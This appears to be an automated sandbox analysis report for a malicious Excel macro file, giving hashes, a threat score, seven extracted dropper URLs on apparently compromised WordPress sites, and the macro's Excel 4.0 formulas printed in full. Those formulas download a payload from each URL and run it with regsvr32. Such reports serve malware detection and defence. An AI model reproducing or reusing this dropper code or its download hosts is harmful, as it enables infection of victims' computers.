Overview

overview

10

Static

static

10

5bce8e6d07...8.xlsm

windows7-x64

10

5bce8e6d07...8.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    5bce8e6d07f159c9dd7a45a8735f4508a1c8d5db2ed68dc9d48c24a5893fb2c8

  • Size

    35KB

  • Sample

    241120-ysdmesxjcl

  • MD5

    87fe31a573440b6b45f171fdfb736c83

  • SHA1

    2e89af7743512f30c8b5856c73969d2f504fc0b4

  • SHA256

    5bce8e6d07f159c9dd7a45a8735f4508a1c8d5db2ed68dc9d48c24a5893fb2c8

  • SHA512

    36fb7880edf3450bb8d2d0bf0e8ef3a32cf1a8d1524c1b09dbdd8f4e967dc67c3c7f28c31397465161d31b08c65881f93383103fd25c507a11f8a50298a9c217

  • SSDEEP

    768:dsmn9tnd5euAjOZpqcVbZYpoRuBlIiOKMArOoooooooooooooooooooooooooofS:dFtndguUOZZ1ZYpoQ/pMA6Kt

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://dlqsclub.com/wp-content/uploads/8ST56kZvvQ/

https://blog.nilbt.com/wp-includes/Text/Diff/aleM3D/

https://idolevran.com/wp-admin/nKRqye7TwOjZVjvFib/

https://hindi.muslimmirror.com/wp-includes/NfqhqWd1AfATg6PH3MV/

https://appiterra.com/wp-admin/2sv4jwSsOGh9vD10/

https://reproartivf.com/4MFHyUfpZHmD9VMxCd/A/

https://britonsolicitors.com/wp-admin/mMYswFFOmBVkkjcb3/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dlqsclub.com/wp-content/uploads/8ST56kZvvQ/","..\xdha.ocx",0,0) =IF('EGVSBSR'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://blog.nilbt.com/wp-includes/Text/Diff/aleM3D/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://idolevran.com/wp-admin/nKRqye7TwOjZVjvFib/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://hindi.muslimmirror.com/wp-includes/NfqhqWd1AfATg6PH3MV/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://appiterra.com/wp-admin/2sv4jwSsOGh9vD10/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://reproartivf.com/4MFHyUfpZHmD9VMxCd/A/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://britonsolicitors.com/wp-admin/mMYswFFOmBVkkjcb3/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C28<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xdha.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://dlqsclub.com/wp-content/uploads/8ST56kZvvQ/
xlm40.dropper

https://blog.nilbt.com/wp-includes/Text/Diff/aleM3D/
xlm40.dropper

https://idolevran.com/wp-admin/nKRqye7TwOjZVjvFib/
xlm40.dropper

https://hindi.muslimmirror.com/wp-includes/NfqhqWd1AfATg6PH3MV/
xlm40.dropper

https://appiterra.com/wp-admin/2sv4jwSsOGh9vD10/
xlm40.dropper

https://reproartivf.com/4MFHyUfpZHmD9VMxCd/A/
xlm40.dropper

https://britonsolicitors.com/wp-admin/mMYswFFOmBVkkjcb3/

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://dlqsclub.com/wp-content/uploads/8ST56kZvvQ/
xlm40.dropper

https://blog.nilbt.com/wp-includes/Text/Diff/aleM3D/
xlm40.dropper

https://idolevran.com/wp-admin/nKRqye7TwOjZVjvFib/

Targets

    • Target

      5bce8e6d07f159c9dd7a45a8735f4508a1c8d5db2ed68dc9d48c24a5893fb2c8

    • Size

      35KB

    • MD5

      87fe31a573440b6b45f171fdfb736c83

    • SHA1

      2e89af7743512f30c8b5856c73969d2f504fc0b4

    • SHA256

      5bce8e6d07f159c9dd7a45a8735f4508a1c8d5db2ed68dc9d48c24a5893fb2c8

    • SHA512

      36fb7880edf3450bb8d2d0bf0e8ef3a32cf1a8d1524c1b09dbdd8f4e967dc67c3c7f28c31397465161d31b08c65881f93383103fd25c507a11f8a50298a9c217

    • SSDEEP

      768:dsmn9tnd5euAjOZpqcVbZYpoRuBlIiOKMArOoooooooooooooooooooooooooofS:dFtndguUOZZ1ZYpoQ/pMA6Kt

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks